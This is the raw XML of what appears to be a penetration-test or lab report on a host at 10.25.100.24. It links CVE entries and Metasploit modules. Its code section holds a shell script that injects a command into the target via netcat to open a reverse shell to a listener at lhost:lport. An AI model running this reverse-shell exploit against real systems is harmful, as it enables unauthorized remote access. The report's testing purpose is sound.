    <w:p w14:paraId="3CC0FCD1" w14:textId="77777777" w:rsidR="008C24E1" w:rsidRDefault="008C24E1" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    exit 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52AFBF2F" w14:textId="77777777" w:rsidR="008C24E1" w:rsidRDefault="008C24E1" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:r>
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B463F13" w14:textId="77777777" w:rsidR="008C24E1" w:rsidRDefault="008C24E1" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10EE7CF1" w14:textId="77777777" w:rsidR="008C24E1" w:rsidRDefault="008C24E1" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rhost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=$1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283BF681" w14:textId="77777777" w:rsidR="008C24E1" w:rsidRDefault="008C24E1" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=$2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6C7B3F" w14:textId="77777777" w:rsidR="008C24E1" w:rsidRDefault="008C24E1" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lhost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=$3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC0E533" w14:textId="77777777" w:rsidR="008C24E1" w:rsidRDefault="008C24E1" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=$4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462589AD" w14:textId="77777777" w:rsidR="008C24E1" w:rsidRDefault="008C24E1" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="291F9BDF" w14:textId="77777777" w:rsidR="008C24E1" w:rsidRDefault="008C24E1" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:r>
        <w:t>(echo "AB; rm /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>bd;mkfifo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bd;cat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/bd|/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>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2&gt;&amp;1|nc $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lhost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &gt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">/bd" | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rhost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>) &amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CAB94AD" w14:textId="77777777" w:rsidR="008C24E1" w:rsidRDefault="008C24E1" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="70AB3EAC" w14:textId="27654DF0" w:rsidR="007B5973" w:rsidRDefault="007B5973">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="746BA6E2" w14:textId="77777777" w:rsidR="00915B54" w:rsidRDefault="00915B54" w:rsidP="007B5973"/>
    <w:sectPr w:rsidR="00915B54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23E60" w14:textId="77777777" w:rsidR="00857ADD" w:rsidRDefault="00857ADD" w:rsidP="0049075E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="49D192AE" w14:textId="77777777" w:rsidR="00857ADD" w:rsidRDefault="00857ADD" w:rsidP="00490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5198142"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtEndPr/>
    <w:sdtContent>
      <w:p w14:paraId="0A3167A1" w14:textId="4254946B" w:rsidR="0049075E" w:rsidRDefault="0049075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B193800" w14:textId="77777777" w:rsidR="0049075E" w:rsidRDefault="004907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52C6F2" w14:textId="77777777" w:rsidR="00857ADD" w:rsidRDefault="00857ADD" w:rsidP="0049075E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="1A7ABCCA" w14:textId="77777777" w:rsidR="00857ADD" w:rsidRDefault="00857ADD" w:rsidP="00490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92F85"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="43904D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05FDE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2B3058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06241"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4EBCDA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14809"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8612F3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A7FD3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4E963B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5E"/>
    <w:rsid w:val="00023819"/>
    <w:rsid w:val="00060520"/>
    <w:rsid w:val="00094A90"/>
    <w:rsid w:val="000A5419"/>
    <w:rsid w:val="000E60B2"/>
    <w:rsid w:val="00103461"/>
    <w:rsid w:val="00104729"/>
    <w:rsid w:val="00115970"/>
    <w:rsid w:val="001550C8"/>
    <w:rsid w:val="0021080C"/>
    <w:rsid w:val="00233020"/>
    <w:rsid w:val="00241C3C"/>
    <w:rsid w:val="002547AB"/>
    <w:rsid w:val="00280765"/>
    <w:rsid w:val="00300AFA"/>
    <w:rsid w:val="00322AF2"/>
    <w:rsid w:val="003339ED"/>
    <w:rsid w:val="003437D2"/>
    <w:rsid w:val="00392C7A"/>
    <w:rsid w:val="00402358"/>
    <w:rsid w:val="004076A9"/>
    <w:rsid w:val="0049075E"/>
    <w:rsid w:val="004A3F68"/>
    <w:rsid w:val="004C49C2"/>
    <w:rsid w:val="0052608E"/>
    <w:rsid w:val="005F5AFF"/>
    <w:rsid w:val="00624BEE"/>
    <w:rsid w:val="006254C6"/>
    <w:rsid w:val="00673856"/>
    <w:rsid w:val="006B333A"/>
    <w:rsid w:val="006C4B8B"/>
    <w:rsid w:val="006C554E"/>
    <w:rsid w:val="006E5841"/>
    <w:rsid w:val="007451F9"/>
    <w:rsid w:val="00780ECA"/>
    <w:rsid w:val="007B5973"/>
    <w:rsid w:val="00857ADD"/>
    <w:rsid w:val="008C24E1"/>
    <w:rsid w:val="008D36A2"/>
    <w:rsid w:val="00915B54"/>
    <w:rsid w:val="00923E97"/>
    <w:rsid w:val="00930AEE"/>
    <w:rsid w:val="00951F3D"/>
    <w:rsid w:val="009A23C1"/>
    <w:rsid w:val="009D5A42"/>
    <w:rsid w:val="00A02963"/>
    <w:rsid w:val="00A44266"/>
    <w:rsid w:val="00A61FAB"/>
    <w:rsid w:val="00A77FC3"/>
    <w:rsid w:val="00A81612"/>
    <w:rsid w:val="00A87C88"/>
    <w:rsid w:val="00AF5782"/>
    <w:rsid w:val="00B5053C"/>
    <w:rsid w:val="00B678FE"/>
    <w:rsid w:val="00BA2A73"/>
    <w:rsid w:val="00BB143D"/>
    <w:rsid w:val="00BC6E8B"/>
    <w:rsid w:val="00BD55B3"/>
    <w:rsid w:val="00C21845"/>
    <w:rsid w:val="00C66923"/>
    <w:rsid w:val="00CB19DD"/>
    <w:rsid w:val="00CB502F"/>
    <w:rsid w:val="00D43835"/>
    <w:rsid w:val="00D66EEA"/>
    <w:rsid w:val="00D72FFB"/>
    <w:rsid w:val="00D920CA"/>
    <w:rsid w:val="00E36033"/>
    <w:rsid w:val="00E6595B"/>
    <w:rsid w:val="00E7001A"/>
    <w:rsid w:val="00E867D8"/>
    <w:rsid w:val="00EA1F79"/>
    <w:rsid w:val="00EC79C0"/>
    <w:rsid w:val="00EF432B"/>
    <w:rsid w:val="00F2489E"/>
    <w:rsid w:val="00F3447E"/>
    <w:rsid w:val="00F41533"/>
    <w:rsid w:val="00F55621"/>
    <w:rsid w:val="00F5666E"/>
    <w:rsid w:val="00F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B581"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{0341AA8C-BE23-4AC7-A1AE-C07A57D6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F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9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30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075E"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:contextualSpacing/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Bahnschrift SemiBold" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Bahnschrift SemiBold" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:noProof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9075E"/>
    <w:rPr>
      <w:rFonts w:ascii="Bahnschrift SemiBold" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Bahnschrift SemiBold" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:noProof/>
      <w:spacing w:val="-10"/>
      <w:kern w:val="28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90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75E"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00490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75E"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="0049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9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9075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075E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D72FFB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72F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72F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2FF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72F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053C"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Monospace">
    <w:name w:val="Monospace"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:rsid w:val="00A61FAB"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:sz w:val="16"/>
      <w:lang w:eastAsia="en-NZ"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading3"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="0010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489E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B19D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B19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302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11597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115970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6254C6"/>
    <w:rPr>
      <w:color w:val="954F72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547AB"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="220" w:hanging="220"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-c">
    <w:name w:val="pl-c"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="006C554E"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-k">
    <w:name w:val="pl-k"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="006C554E"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-smi">
    <w:name w:val="pl-smi"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="006C554E"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-c1">
    <w:name w:val="pl-c1"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="006C554E"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-s">
    <w:name w:val="pl-s"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="006C554E"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-pds">
    <w:name w:val="pl-pds"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="006C5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C88"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20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37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6872">
          <w:marLeft w:val="-15"/>
          <w:marRight w:val="-15"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="6" w:space="0" w:color="E1E4E8"/>
            <w:left w:val="single" w:sz="6" w:space="12" w:color="E1E4E8"/>
            <w:bottom w:val="single" w:sz="6" w:space="0" w:color="E1E4E8"/>
            <w:right w:val="single" w:sz="6" w:space="12" w:color="E1E4E8"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1164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1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4E8"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="19602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5.100.24:80/drupal/" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://10.25.100.24:80/icons/" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.rapid7.com/db/modules/exploit/multi/http/drupal_drupageddon" TargetMode="Externa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png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://10.25.100.24:80/chat/" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cvedetails.com/cve/CVE-2014-3704/" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.rapid7.com/db/modules/exploit/unix/irc/unreal_ircd_3281_backdoor" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///\\10.25.100.24\public" TargetMode="Externa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0.25.100.24:80/uploads/" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cvedetails.com/cve/CVE-2010-2075/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\\10.25.100.24\print$" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.rapid7.com/db/modules/exploit/linux/samba/is_known_pipenam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10.25.100.24:80/phpmyadmin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10.25.100.24:80/payroll_app.php" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///\\10.25.100.24\IPC$" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cvedetails.com/cve/CVE-2017-7494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</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Mason Gill</cp:lastModifiedBy>
  <cp:revision>73</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-08-26T09:42:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-08-26T11:54:00Z</dcterms:modified>
</cp:coreProperties>
</file>